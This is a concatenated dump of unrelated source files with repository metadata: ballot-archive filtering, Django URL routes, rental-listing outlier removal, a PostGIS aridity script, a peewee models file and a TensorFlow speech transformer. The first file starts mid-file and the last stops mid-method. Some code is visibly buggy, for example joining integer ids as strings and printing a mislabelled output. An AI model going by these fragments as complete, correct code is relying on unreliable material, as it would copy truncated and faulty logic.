def filter_proposed_list_by_ballotid(argsdict, proposed_list, get_ballot_id_function, silent):
"""
Return filtered list of proposed_list.
argsdict['ballotid'] - list of ballot_ids which will be included.
If empty, do not filter.
get_ballot_id_function - this function is used to extract the ballot_id from one entry in the proposed_list
"""
include_ballotids = argsdict.get('ballotid', [])
if not isinstance(include_ballotids, list):
include_ballotids = [include_ballotids]
exclude_ballotids = argsdict.get('exclude_ballotid', [])
if not isinstance(exclude_ballotids, list):
exclude_ballotids = [exclude_ballotids]
if (not include_ballotids or not len(include_ballotids)) and \
(not exclude_ballotids or not len(exclude_ballotids)):
return proposed_list
utils.sts("Filtering list by specified ballotids...", 3)
selected_items = []
for item in proposed_list:
ballotid_of_item = int(get_ballot_id_function(item))
if include_ballotids:
# include_ballotids specification overrides exclusion.
if ballotid_of_item in include_ballotids:
selected_items.append(item)
elif exclude_ballotids:
if not ballotid_of_item in exclude_ballotids:
selected_items.append(item)
else:
selected_items = proposed_list
break
utils.sts(f"Selected {len(selected_items)} item(s) from the list.", 3)
return selected_items
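# Worked example (made-up ids): an explicit include list wins over exclusions, and
# ballot ids are compared as integers after extraction from each item.
# filter_proposed_list_by_ballotid({'ballotid': [101, 103]},
#                                  ['b/101i.pdf', 'b/102i.pdf', 'b/103i.pdf'],
#                                  get_ballotid, silent=True)
#   -> ['b/101i.pdf', 'b/103i.pdf']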
def filter_paths_by_limit(argsdict, file_paths):
"""
Return filtered list of file paths.
'precincts' parameter should be a list of precincts to which
list should be filtered.
"""
config_dict['LIMITED_NUM'] = 0
files_limit = argsdict.get('limit')
if files_limit is not None and files_limit >= config_dict['LIMITED_NUM']:
list_len = len(file_paths)
diff = files_limit - list_len
file_paths = file_paths[:(files_limit - config_dict['LIMITED_NUM'])]
if config_dict['LIMITED_NUM'] < files_limit:
config_dict['LIMITED_NUM'] += list_len if diff >= 0 else files_limit - config_dict['LIMITED_NUM']
if config_dict['LIMITED_NUM'] > files_limit:
config_dict['LIMITED_NUM'] = files_limit
return file_paths
def filter_image_file_paths(argsdict, file_paths):
"""
argsdict: arguments as provided from CLI and input file.
file_paths: file paths from archive already filtered to image files.
filters list based on precinct, skip, and limit
returns file_paths
"""
file_paths = filter_paths_by_precinct(argsdict, file_paths)
file_paths = filter_paths_by_ballotid(argsdict, file_paths)
file_paths = filter_paths_by_skip(argsdict, file_paths)
file_paths = filter_paths_by_limit(argsdict, file_paths)
return file_paths
file_paths_cache = {}
archives = []
def copy_ballot_pdfs_to_report_folder(argsdict, ballot_id_list, dirname):
utils.sts(f"Copying {len(ballot_id_list)} ballot image files classified as {dirname}", 3)
if not len(ballot_id_list): return
target_folder = DB.dirpath_from_dirname(dirname)
mutated_ballot_id_list = ballot_id_list.copy()
# first create the list of all the archive paths in this archive that are in ballot_id_list
# and open the archives and leave them open during processing.
if not file_paths_cache:
for archive_idx, archive_path in enumerate(argsdict['source']):
archive = open_archive(argsdict, archive_path)
archives.append(archive)
file_paths_list = get_image_file_paths_from_archive(archive)
file_paths_cache[archive_idx] = file_paths_list
while mutated_ballot_id_list:
ballot_id = mutated_ballot_id_list.pop(0)
target_filename = f"{ballot_id}i.pdf"
for archive_idx in range(len(archives)):
ballot_paths = [x for x in file_paths_cache[archive_idx] if re.search(r'[\\/]' + target_filename, x)]
if len(ballot_paths):
utils.sts(f"Extracting {ballot_paths[0]} from archive {archive_idx}", 3)
archives[archive_idx].extract(ballot_paths[0], path=target_folder)
break
else:
mbidl = ', '.join(mutated_ballot_id_list)
utils.sts(f"Logic error: Failed to find some ballot_ids in ballot archives: {mbidl}", 0)
traceback.print_stack()
sys.exit(1)
def copy_ballot_pdfs_from_archive_to_report_folder(archive, filepaths, ballot_id, dirname):
target_filename = f"{ballot_id}i.pdf"
target_folder = DB.dirpath_from_dirname(dirname)
ballot_paths = [x for x in filepaths if re.search(r'[\\/]' + target_filename, x)]
if len(ballot_paths):
utils.sts(f"Extracting {ballot_paths[0]} from archive", 3)
archive.extract(ballot_paths[0], path=target_folder)
return
utils.sts(f"Logic error: Failed to find ballot_id {ballot_id} in ballot archive.", 0)
traceback.print_stack()
sys.exit(1)
def extract_file(archive, file_name, dest_filepath):
""" given zip archive which is already open, extract a single file 'file_name' and write it to dest filepath.
Note that zipfile.extract() does not work because it always reproduces the entire path.
"""
newfilebytes = bytes(archive.read(adjust_filepath_separators(archive, file_name)))
fh = open(dest_filepath, "wb")
fh.write(newfilebytes)
fh.close()
|
[
"robertoroie123@gmail.com"
] |
robertoroie123@gmail.com
|
52c7f86beb60a85355457f8fc03219f7a0237894
|
4a81ae61f744ba95861767ed9344b66b392eceda
|
/wf_last/models/__init__.py
|
0092a3be45ee9c4799790bcdaaa11c7ff556859f
|
[] |
no_license
|
appsgateteam/Waterfall
|
37f7b11ee9a30eaa9f23521e9f437f2a0865e44d
|
641588582c3974390098f1ae331d5048bd549bb0
|
refs/heads/master
| 2023-02-02T21:05:06.098464
| 2020-12-27T08:33:29
| 2020-12-27T08:33:29
| 283,480,124
| 0
| 2
| null | 2020-12-27T08:33:30
| 2020-07-29T11:25:38
|
Python
|
UTF-8
|
Python
| false
| false
| 116
|
py
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from . import wf
|
[
"56960524+Ziad-Monim@users.noreply.github.com"
] |
56960524+Ziad-Monim@users.noreply.github.com
|
4eb785714e385a17901264575757a9da0fa57fb7
|
b88288f19a3094439a86e22cdf4fccfd64072f59
|
/google_dependency/urls.py
|
eb29f857d3cf17663a25399cdbea250f2de7792d
|
[
"MIT"
] |
permissive
|
EdgarSun/Django-Demo
|
96c9ca46027db5321fd76e239afd6a9edb4cf288
|
7775d5d6f8d4a0e6c4a6b042bf89ce19b15f2d8e
|
refs/heads/master
| 2016-09-02T19:59:23.350255
| 2013-07-17T03:35:35
| 2013-07-17T03:35:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 374
|
py
|
from django.conf.urls.defaults import *
urlpatterns = patterns('google_dependency.blobstore_handler',
(r'^$', 'upload_handler'),
(r'^(?P<pk>\d+)/(?P<entityID>\d+)$', 'upload_handler'),
(r'^media/(?P<pk>\d+)$', 'retrieve_handler'),
(r'^media/(?P<pk>\d+)/(?P<size>\d+)/(?P<crop>\d+)$', 'retrieve_handler'),
(r'^delete/(?P<pk>\d+)/$', 'delete_handler'),
)
|
[
"edgar@SUNYAN-WS.ccp.ad.local"
] |
edgar@SUNYAN-WS.ccp.ad.local
|
b0bbbe368d0d4a2c61ed0d5b09e17455b8212fd0
|
cbc39b8013558a329cd885042002838828103c1a
|
/milestone1/outlier.py
|
0f1ee1ef0fd373e7622f6e3eded507c7acac742d
|
[] |
no_license
|
cjl99/Kaggle-Rental-Listing
|
8914574866f8b07f8dfaf26280eb544c4da19baf
|
5d96dc9915e5e515b41a91cd3a2a49c059a7f749
|
refs/heads/master
| 2022-12-27T20:17:00.970984
| 2020-10-16T07:47:46
| 2020-10-16T07:47:46
| 237,680,260
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,714
|
py
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import time
import basic_func as func
# -----------------outlier--------------
# find listing_id is unique or not
(listing_id, features, values, train_df) = func.load_unicef_data("mid_train.json")
print(train_df.shape)
# drop outlier of high price(>20000)
# print(train_df)
ulimit = 20000 # find out from figure in PART1
outlier_price = train_df.loc[train_df["price"] > ulimit, ["listing_id"]]
print("The number of outliers in price: " + str(outlier_price.shape[0]))
train_df = train_df.loc[~train_df["listing_id"].isin(outlier_price["listing_id"])]
# print(df)
# drop outlier of longitude(<1% and >99%)
llimit = np.percentile(train_df['longitude'], 1)
ulimit = np.percentile(train_df['longitude'], 99)
outlier_longitude = train_df.loc[train_df["longitude"] > ulimit, ["listing_id"]]
outlier_longitude2 = train_df.loc[train_df["longitude"] < llimit, ["listing_id"]]
print("The number of outliers in longitude: " + str(outlier_longitude.shape[0] + outlier_longitude2.shape[0]))
train_df = train_df.loc[~train_df["listing_id"].isin(outlier_longitude["listing_id"])]
train_df = train_df.loc[~train_df["listing_id"].isin(outlier_longitude2["listing_id"])]
# drop outlier of latitude(<1% and >99%)
llimit = np.percentile(train_df['latitude'], 1)
ulimit = np.percentile(train_df['latitude'], 99)
outlier_latitude = train_df.loc[train_df["latitude"] > ulimit, ["listing_id"]]
outlier_latitude2 = train_df.loc[train_df["latitude"] < llimit, ["listing_id"]]
print("The number of outliers in latitude: " + str(outlier_latitude.shape[0] + outlier_latitude2.shape[0]))
train_df = train_df.loc[~train_df["listing_id"].isin(outlier_latitude["listing_id"])]
train_df = train_df.loc[~train_df["listing_id"].isin(outlier_latitude2["listing_id"])]
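# The same 1%/99% trim is applied to longitude and latitude above; the helper below
# (added for clarity, not used elsewhere in this script) captures that pattern.
def drop_percentile_outliers(df, column, low=1, high=99):
    """Return df without rows whose `column` falls outside the [low, high] percentiles."""
    llimit = np.percentile(df[column], low)
    ulimit = np.percentile(df[column], high)
    return df.loc[(df[column] >= llimit) & (df[column] <= ulimit)]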
# years outlier
y = features.index('created')
timeArray = list()
years = list()
for value in values[:, y]:
timeArray.append(time.strptime(value, "%Y-%m-%d %H:%M:%S"))
# use a distinct loop variable so the imported time module is not shadowed
for parsed_time in timeArray:
    years.append(parsed_time.tm_year)
count = 0
for i in range(len(years)):
if years[i] != 2016:
count = count + 1
print("The number of created not in 2016: " + str(count)) # result is 0
# bathroom outlier
fig_bed = plt.figure(num='fig_bath')
plt.figure(num='fig_bath')
plt.scatter(range(train_df['bathrooms'].shape[0]), np.sort(train_df['bathrooms']))
plt.xlabel('index', fontsize=12)
plt.ylabel('bathroom', fontsize=12)
plt.show()
# drop outlier of bathroom(<1% and >99%)
ulimit = 8 # get from figure
outlier_bathroom = train_df.loc[train_df['bathrooms'] > ulimit, ["listing_id"]]
print("The number of outliers in bathroom: " + str(outlier_bathroom.shape[0]))
train_df = train_df.loc[~train_df["listing_id"].isin(outlier_bathroom["listing_id"])]
# --------------------
# bedrooms outlier
fig_bed = plt.figure(num='fig_bed')
plt.figure(num='fig_bed')
plt.scatter(range(train_df['bedrooms'].shape[0]), np.sort(train_df['bedrooms']))
plt.xlabel('index', fontsize=12)
plt.ylabel('bedrooms', fontsize=12)
plt.show()
print("The number of outliers in bathroom: " + str(0))
print(train_df.shape)
train_df.to_json("final_train.json")
# ------------------
# display_address outlier
# p = features.index("display_address")
# q = features.index("description")
# length_disp_addr = list()
# for i in range(train_df['display_address'].shape[0]):
# length_disp_addr.append(len(values[i, p]))
# fig_disp_addr = plt.figure(num='fig_disp_addr')
# plt.figure(num='fig_disp_addr')
# plt.scatter(range(len(length_disp_addr)), np.sort(length_disp_addr))
# plt.xlabel('index', fontsize=12)
# plt.ylabel('display_address lenhgth', fontsize=12)
# plt.show()
#
# deal with missing values in street_address and display_address
# p = features.index("display_address")
# q = features.index("street_address")
# disp_addr = values[:, p]
# street_addr = values[:, q]
# count = 0
# for i in range(disp_addr.shape[0]):
# # display_address is "" street address is "", assign street address to display address without number
# if values[i, p] == "" and values[i, q] != "":
# count = count + 1
# temp_str = values[i, q]
# for j in range(len(temp_str)):
# if temp_str[j] == " ":
# values[i, p] = temp_str[j + 1:]
# # print(temp_str + "------> " + values[i, p])
# break
#
#
# count = 0
# for i in range(street_addr.shape[0]):
# if values[i, q] == "" and values[i, p] != "":
# count = count + 1
# values[i, q] = values[i, p]
# print(values[i, p] + "------> " + values[i, q])
# print(count)
|
[
"noreply@github.com"
] |
cjl99.noreply@github.com
|
5254d72522b50843e063de15fc722b54232c0aad
|
7dc80048f72e106f977b49ea882c63cc9623e3ef
|
/notebooks/production/Y2018M06D04_RH_Arid_PostGIS_30sPfaf06_V01.py
|
1b5ca3dff79cd1e2a70ff97152e149e19c8c352e
|
[] |
no_license
|
YanCheng-go/Aqueduct30Docker
|
8400fdea23bfd788f9c6de71901e6f61530bde38
|
6606fa03d145338d48101fc53ab4a5fccf3ebab2
|
refs/heads/master
| 2022-12-16T03:36:25.704103
| 2020-09-09T14:38:28
| 2020-09-09T14:38:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,324
|
py
|
# coding: utf-8
# In[1]:
""" Add column for arid subbasins.
-------------------------------------------------------------------------------
Author: Rutger Hofste
Date: 20180604
Kernel: python35
Docker: rutgerhofste/gisdocker:ubuntu16.04
Args:
TESTING (Boolean) : Toggle testing case.
SCRIPT_NAME (string) : Script name.
OUTPUT_VERSION (integer) : output version.
DATABASE_ENDPOINT (string) : RDS or postGreSQL endpoint.
DATABASE_NAME (string) : Database name.
TABLE_NAME_AREA_30SPFAF06 (string) : Table name used for areas. Must exist
on same database as used in rest of script.
S3_INPUT_PATH_RIVERDISCHARGE (string) : AWS S3 input path for
riverdischarge.
S3_INPUT_PATH_DEMAND (string) : AWS S3 input path for
demand.
"""
TESTING = 1
OVERWRITE_OUTPUT = 1
SCRIPT_NAME = 'Y2018M06D04_RH_Arid_PostGIS_30sPfaf06_V01'
OUTPUT_VERSION = 1
THRESHOLD_ARID_YEAR = 0.03 #units are m/year, threshold defined by Aqueduct 2.1
THRESHOLD_LOW_WATER_USE_YEAR = 0.012 #units are m/year, threshold defined by Aqueduct 2.1
DATABASE_ENDPOINT = "aqueduct30v05.cgpnumwmfcqc.eu-central-1.rds.amazonaws.com"
DATABASE_NAME = "database01"
INPUT_TABLE_NAME = "y2018m06d01_rh_moving_average_postgis_30spfaf06_v01_v01"
OUTPUT_TABLE_NAME = SCRIPT_NAME.lower() + "_v{:02.0f}".format(OUTPUT_VERSION)
print("Input Table: " , INPUT_TABLE_NAME,
"\nOutput Table: " , OUTPUT_TABLE_NAME)
# In[2]:
import time, datetime, sys
dateString = time.strftime("Y%YM%mD%d")
timeString = time.strftime("UTC %H:%M")
start = datetime.datetime.now()
print(dateString,timeString)
sys.version
# In[3]:
# imports
import re
import os
import numpy as np
import pandas as pd
import aqueduct3
from datetime import timedelta
from sqlalchemy import *
pd.set_option('display.max_columns', 500)
# In[4]:
F = open("/.password","r")
password = F.read().splitlines()[0]
F.close()
engine = create_engine("postgresql://rutgerhofste:{}@{}:5432/{}".format(password,DATABASE_ENDPOINT,DATABASE_NAME))
connection = engine.connect()
if OVERWRITE_OUTPUT:
sql = text("DROP TABLE IF EXISTS {};".format(OUTPUT_TABLE_NAME))
result = engine.execute(sql)
# In[5]:
if TESTING:
sql = "CREATE TABLE {} AS SELECT * FROM {} WHERE pfafid_30spfaf06 < 130000 ;".format(OUTPUT_TABLE_NAME,INPUT_TABLE_NAME)
else:
sql = "CREATE TABLE {} AS SELECT * FROM {};".format(OUTPUT_TABLE_NAME,INPUT_TABLE_NAME)
result = engine.execute(sql)
# In[6]:
sql = "ALTER TABLE {} ADD COLUMN arid_boolean_30spfaf06 integer DEFAULT 0".format(OUTPUT_TABLE_NAME)
result = engine.execute(sql)
# In[11]:
threshold_arid_month = THRESHOLD_ARID_YEAR / 12
threshold_low_water_use_month = THRESHOLD_LOW_WATER_USE_YEAR / 12
print(threshold_arid_month)
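# Unit check for the conversion above: the thresholds are defined in m/year, so the
# monthly cut-offs are 0.03 / 12 = 0.0025 m/month (arid) and
# 0.012 / 12 = 0.001 m/month (low water use).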
# In[10]:
# Set Arid for monthly columns
sql = "UPDATE y2018m06d04_rh_arid_postgis_30spfaf06_v01_v01 SET arid_boolean_30spfaf06 = 1 WHERE temporal_resolution = 'month' AND ma10_riverdischarge_m_30spfaf06 < {};".format(threshold_arid_month)
result = engine.execute(sql)
# In[13]:
# Set Arid for year columns
sql = "UPDATE y2018m06d04_rh_arid_postgis_30spfaf06_v01_v01 SET arid_boolean_30spfaf06 = 1 WHERE temporal_resolution = 'year' AND ma10_riverdischarge_m_30spfaf06 < {};".format(THRESHOLD_ARID_YEAR)
result = engine.execute(sql)
# In[ ]:
|
[
"rutgerhofste@gmail.com"
] |
rutgerhofste@gmail.com
|
29360104129bcdd0eb4af42a8b6c91fe670212a8
|
441785c5065ce3709c69ddfc39ce5eb99400516b
|
/py/db.py
|
5c0f839c3aa703d4adf8dbf05436e24c94028149
|
[
"MIT"
] |
permissive
|
val06/restpie3
|
0423f94fa5f8bb95e29721721314d4e08882f1b9
|
bd63d26658988febfaa39bce192257fb18e4110c
|
refs/heads/master
| 2022-04-30T02:36:55.434505
| 2020-03-25T19:56:46
| 2020-03-25T19:56:46
| 249,764,844
| 0
| 0
|
MIT
| 2020-03-24T16:51:36
| 2020-03-24T16:51:35
| null |
UTF-8
|
Python
| false
| false
| 5,542
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""db.py: Models and functions for accessing the database
- using peewee orm
- preferably have all SQL in this file
Author: Tomi.Mickelsson@iki.fi
http://docs.peewee-orm.com/en/latest/peewee/querying.html
http://docs.peewee-orm.com/en/latest/peewee/playhouse.html#postgres-ext
"""
from peewee import *
from playhouse.shortcuts import model_to_dict
from playhouse.postgres_ext import PostgresqlExtDatabase, ArrayField, BinaryJSONField, BooleanField, JSONField
# support for arrays of uuid
import psycopg2.extras
psycopg2.extras.register_uuid()
from flask import abort
import config
import logging
log = logging.getLogger("db")
database = PostgresqlExtDatabase(config.DATABASE_NAME,
user=config.DATABASE_USER, password=config.DATABASE_PASSWORD,
host=config.DATABASE_HOST, port=config.DATABASE_PORT)
# --------------------------------------------------------------------------
# Base model and common methods
class BaseModel(Model):
"""Base class for all database models."""
# exclude these fields from the serialized dict
EXCLUDE_FIELDS = []
def serialize(self):
"""Serialize the model into a dict."""
d = model_to_dict(self, recurse=False, exclude=self.EXCLUDE_FIELDS)
d["id"] = str(d["id"]) # unification: id is always a string
return d
class Meta:
database = database
def get_object_or_404(model, **kwargs):
"""Retrieve a single object or abort with 404."""
try:
return model.get(**kwargs)
except model.DoesNotExist:
log.warning("NO OBJECT {} {}".format(model, kwargs))
abort(404)
def get_object_or_none(model, **kwargs):
"""Retrieve a single object or return None."""
try:
return model.get(**kwargs)
except model.DoesNotExist:
return None
# --------------------------------------------------------------------------
# USER
class User(BaseModel):
# Should user.id be an integer or uuid? Both have pros and cons.
# Since user.id is sensitive data, I selected uuid here.
id = UUIDField(primary_key=True)
id.auto_increment = True # is auto generated by server
email = TextField()
password = TextField()
first_name = TextField()
last_name = TextField()
role = TextField()
tags = ArrayField(TextField)
created = DateTimeField()
modified = DateTimeField()
EXCLUDE_FIELDS = [password] # never expose password
def is_superuser(self):
return self.role == "superuser"
def full_name(self):
return "{} {}".format(self.first_name, self.last_name or '')
def serialize(self):
"""Serialize this object to dict/json."""
d = super(User, self).serialize()
# add extra data
d["fullname"] = self.full_name()
d["tags"] = self.tags or [] # never None
return d
def __str__(self):
return "<User {}, {}, role={}>".format(self.id,
self.email, self.role)
class Meta:
db_table = 'users'
def get_user(uid):
"""Return user object or throw."""
return get_object_or_404(User, id=uid)
def get_user_by_email(email):
"""Return user object or None"""
if not email:
return None
try:
# return User.select().where(User.email == email).get()
# case insensitive query
sql = "SELECT * FROM users where LOWER(email) = LOWER(%s) LIMIT 1"
args = (email,)
return list(User.raw(sql, args))[0]
except:
return None
def query_users(page=0, limit=1000, search=None):
"""Return list of users. Desc order"""
page = int(page)
limit = int(limit)
q = User.select()
if search:
search = "%"+search+"%"
q = q.where(User.first_name ** search | User.last_name ** search |
User.email ** search)
q = q.paginate(page, limit).order_by(User.id.desc())
return q
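# Hedged usage sketch (example values only): peewee's `**` operator is a
# case-insensitive LIKE, so the search term matches substrings of first name,
# last name or email, returned newest-id first.
# recent_matches = list(query_users(page=1, limit=20, search="gmail"))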
# --------------------------------------------------------------------------
# MOVIE - just an example for CRUD API...
class Movie(BaseModel):
#id - automatic
title = TextField()
director = TextField()
created = DateTimeField()
modified = DateTimeField()
creator = ForeignKeyField(db_column='creator', null=True,
model=User, to_field='id')
class Meta:
db_table = 'movies'
def get_movie(id):
"""Return Movie or throw."""
return get_object_or_404(Movie, id=id)
def query_movies(page=None, limit=None, search='', creator=None):
"""Return list of movies which match given filters."""
page = page or 0
limit = limit or 1000
q = Movie.select()
if search:
search = "%"+search+"%"
q = q.where(Movie.title ** search | Movie.director ** search)
if creator:
q = q.where(Movie.creator == creator)
q = q.paginate(page, limit).order_by(Movie.id)
return q
def query_unique_directors():
"""Return list of unique directors. An example of a raw SQL query."""
sql = "SELECT DISTINCT(director) FROM movies"
rq = database.execute_sql(sql)
return [x[0] for x in rq]
# --------------------------------------------------------------------------
if __name__ == '__main__':
# quick adhoc tests
logging.basicConfig(level=logging.DEBUG)
u = User(first_name="tomi")
u.email = "myemail@example.org"
u.save(force_insert=True)
print(u)
print(list(query_users(0, "10", ".com")))
print(list(query_movies()))
print(query_unique_directors())
|
[
"atomi@iki.fi"
] |
atomi@iki.fi
|
61f008ec7179198c26823fb146e725da539d8e95
|
8f982d411270ea2bd77f93e27ff122ae57ea9189
|
/transf_model.py
|
455053ba03b9fb304d7c08b72c66a51dd188fa6f
|
[] |
no_license
|
axe76/Speech-To-Text-Implementations
|
ad808f7cfa3782fc6a8466e5bba2c16ebe8032fc
|
0e5423340cfec48f44d501285a078f8e2c3d7ab0
|
refs/heads/main
| 2023-08-13T16:55:36.895593
| 2021-10-02T11:33:18
| 2021-10-02T11:33:18
| 412,775,404
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,316
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 24 12:21:48 2021
@author: sense
"""
import tensorflow as tf
import numpy as np
def get_angles(pos, i, d_model):
angle_rates = 1 / np.power(10000, (2 * (i//2)) / np.float32(d_model))
return pos * angle_rates
def positional_encoding_1d(position, d_model):
angle_rads = get_angles(np.arange(position)[:, np.newaxis],
np.arange(d_model)[np.newaxis, :],
d_model)
angle_rads[:, 0::2] = np.sin(angle_rads[:, 0::2])
angle_rads[:, 1::2] = np.cos(angle_rads[:, 1::2])
pos_encoding = angle_rads[np.newaxis, ...]
return tf.cast(pos_encoding, dtype=tf.float32)
def positional_encoding_2d(row,col,d_model):
assert d_model % 2 == 0
row_pos = np.repeat(np.arange(row),col)[:,np.newaxis]
col_pos = np.repeat(np.expand_dims(np.arange(col),0),row,axis=0).reshape(-1,1)
angle_rads_row = get_angles(row_pos,np.arange(d_model//2)[np.newaxis,:],d_model//2)
angle_rads_col = get_angles(col_pos,np.arange(d_model//2)[np.newaxis,:],d_model//2)
angle_rads_row[:, 0::2] = np.sin(angle_rads_row[:, 0::2])
angle_rads_row[:, 1::2] = np.cos(angle_rads_row[:, 1::2])
angle_rads_col[:, 0::2] = np.sin(angle_rads_col[:, 0::2])
angle_rads_col[:, 1::2] = np.cos(angle_rads_col[:, 1::2])
pos_encoding = np.concatenate([angle_rads_row,angle_rads_col],axis=1)[np.newaxis, ...]
return tf.cast(pos_encoding, dtype=tf.float32)
print(positional_encoding_2d(5,4,512))
print(positional_encoding_1d(100,512))
def create_padding_mask(seq):
seq = tf.cast(tf.math.equal(seq, 0), tf.float32)
return seq[:, tf.newaxis, tf.newaxis, :] # (batch_size, 1, 1, seq_len)
def create_look_ahead_mask(size):
mask = 1 - tf.linalg.band_part(tf.ones((size, size)), -1, 0)
return mask # (seq_len, seq_len)
def scaled_dot_product_attention(q, k, v, mask):
matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k)
dk = tf.cast(tf.shape(k)[-1], tf.float32)
scaled_attention_logits = matmul_qk / tf.math.sqrt(dk)
if mask is not None:
scaled_attention_logits += (mask * -1e9)
attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1)
output = tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v)
return output, attention_weights
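# Quick shape check for the attention primitive above (toy tensors, no mask):
# a query of length 3 against 4 keys/values gives (1, 3, 4) weights and a (1, 3, 16) output.
_q = tf.random.normal((1, 3, 8))
_k = tf.random.normal((1, 4, 8))
_v = tf.random.normal((1, 4, 16))
_demo_out, _demo_w = scaled_dot_product_attention(_q, _k, _v, None)
print(_demo_out.shape, _demo_w.shape)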
class MultiHeadAttention(tf.keras.layers.Layer):
def __init__(self, d_model, num_heads):
super(MultiHeadAttention, self).__init__()
self.num_heads = num_heads
self.d_model = d_model
assert d_model % self.num_heads == 0
self.depth = d_model // self.num_heads
self.wq = tf.keras.layers.Dense(d_model)
self.wk = tf.keras.layers.Dense(d_model)
self.wv = tf.keras.layers.Dense(d_model)
self.dense = tf.keras.layers.Dense(d_model)
def split_heads(self, x, batch_size):
x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth))
return tf.transpose(x, perm=[0, 2, 1, 3])
def call(self, v, k, q, mask=None):
batch_size = tf.shape(q)[0]
q = self.wq(q) # (batch_size, seq_len, d_model)
k = self.wk(k) # (batch_size, seq_len, d_model)
v = self.wv(v) # (batch_size, seq_len, d_model)
q = self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth)
k = self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len_k, depth)
v = self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v, depth)
scaled_attention, attention_weights = scaled_dot_product_attention(q, k, v, mask)
scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) # (batch_size, seq_len_q, num_heads, depth)
concat_attention = tf.reshape(scaled_attention,
(batch_size, -1, self.d_model)) # (batch_size, seq_len_q, d_model)
output = self.dense(concat_attention) # (batch_size, seq_len_q, d_model)
return output, attention_weights
def point_wise_feed_forward_network(d_model, dff):
return tf.keras.Sequential([
tf.keras.layers.Dense(dff, activation='relu'), # (batch_size, seq_len, dff)
tf.keras.layers.Dense(d_model) # (batch_size, seq_len, d_model)
])
class EncoderLayer(tf.keras.layers.Layer):
def __init__(self, d_model, num_heads, dff, rate=0.1):
super(EncoderLayer, self).__init__()
self.mha = MultiHeadAttention(d_model, num_heads)
self.ffn = point_wise_feed_forward_network(d_model, dff)
self.layernorm1 = tf.keras.layers.LayerNormalization(epsilon=1e-6)
self.layernorm2 = tf.keras.layers.LayerNormalization(epsilon=1e-6)
self.dropout1 = tf.keras.layers.Dropout(rate)
self.dropout2 = tf.keras.layers.Dropout(rate)
def call(self, x, training, mask=None):
attn_output, _ = self.mha(x, x, x, mask) # (batch_size, input_seq_len, d_model)
attn_output = self.dropout1(attn_output, training=training)
out1 = self.layernorm1(x + attn_output) # (batch_size, input_seq_len, d_model)
ffn_output = self.ffn(out1) # (batch_size, input_seq_len, d_model)
ffn_output = self.dropout2(ffn_output, training=training)
out2 = self.layernorm2(out1 + ffn_output) # (batch_size, input_seq_len, d_model)
return out2
class DecoderLayer(tf.keras.layers.Layer):
def __init__(self, d_model, num_heads, dff, rate=0.1):
super(DecoderLayer, self).__init__()
self.mha1 = MultiHeadAttention(d_model, num_heads)
self.mha2 = MultiHeadAttention(d_model, num_heads)
self.ffn = point_wise_feed_forward_network(d_model, dff)
self.layernorm1 = tf.keras.layers.LayerNormalization(epsilon=1e-6)
self.layernorm2 = tf.keras.layers.LayerNormalization(epsilon=1e-6)
self.layernorm3 = tf.keras.layers.LayerNormalization(epsilon=1e-6)
self.dropout1 = tf.keras.layers.Dropout(rate)
self.dropout2 = tf.keras.layers.Dropout(rate)
self.dropout3 = tf.keras.layers.Dropout(rate)
def call(self, x, enc_output, training,look_ahead_mask=None, padding_mask=None):
attn1, attn_weights_block1 = self.mha1(x, x, x, look_ahead_mask) # (batch_size, target_seq_len, d_model)
attn1 = self.dropout1(attn1, training=training)
out1 = self.layernorm1(attn1 + x)
attn2, attn_weights_block2 = self.mha2(enc_output, enc_output, out1, padding_mask)
attn2 = self.dropout2(attn2, training=training)
out2 = self.layernorm2(attn2 + out1) # (batch_size, target_seq_len, d_model)
ffn_output = self.ffn(out2) # (batch_size, target_seq_len, d_model)
ffn_output = self.dropout3(ffn_output, training=training)
out3 = self.layernorm3(ffn_output + out2) # (batch_size, target_seq_len, d_model)
return out3, attn_weights_block1, attn_weights_block2
class Encoder(tf.keras.layers.Layer):
def __init__(self, num_layers, d_model, num_heads, dff, pe_dim,rate=0.1):
super(Encoder, self).__init__()
self.d_model = d_model
self.num_layers = num_layers
self.embedding = tf.keras.layers.Dense(self.d_model,activation='relu')
self.pos_encoding = positional_encoding_1d(pe_dim,self.d_model)
self.enc_layers = [EncoderLayer(d_model, num_heads, dff, rate) for _ in range(num_layers)]
self.dropout = tf.keras.layers.Dropout(rate)
def call(self, x, training, mask=None):
seq_len = tf.shape(x)[1]
x = self.embedding(x) # (batch_size, input_seq_len(H*W), d_model)
x *= tf.math.sqrt(tf.cast(self.d_model, tf.float32))
x += self.pos_encoding[:, :seq_len, :]
x = self.dropout(x, training=training)
for i in range(self.num_layers):
x = self.enc_layers[i](x, training, mask)
return x # (batch_size, input_seq_len, d_model)
class Decoder(tf.keras.layers.Layer):
def __init__(self, num_layers,d_model,num_heads,dff, target_vocab_size, maximum_position_encoding, rate=0.1):
super(Decoder, self).__init__()
self.d_model = d_model
self.num_layers = num_layers
self.embedding = tf.keras.layers.Embedding(target_vocab_size, d_model)
self.pos_encoding = positional_encoding_1d(maximum_position_encoding, d_model)
#Here it is 1d as input to decoder is caption words
self.dec_layers = [DecoderLayer(d_model, num_heads, dff, rate)
for _ in range(num_layers)]
self.dropout = tf.keras.layers.Dropout(rate)
def call(self, x, enc_output, training,look_ahead_mask=None, padding_mask=None):
seq_len = tf.shape(x)[1]
attention_weights = {}
x = self.embedding(x) # (batch_size, target_seq_len, d_model)
x *= tf.math.sqrt(tf.cast(self.d_model, tf.float32))
x += self.pos_encoding[:, :seq_len, :]
x = self.dropout(x, training=training)
for i in range(self.num_layers):
x, block1, block2 = self.dec_layers[i](x, enc_output, training,
look_ahead_mask, padding_mask)
attention_weights['decoder_layer{}_block1'.format(i+1)] = block1
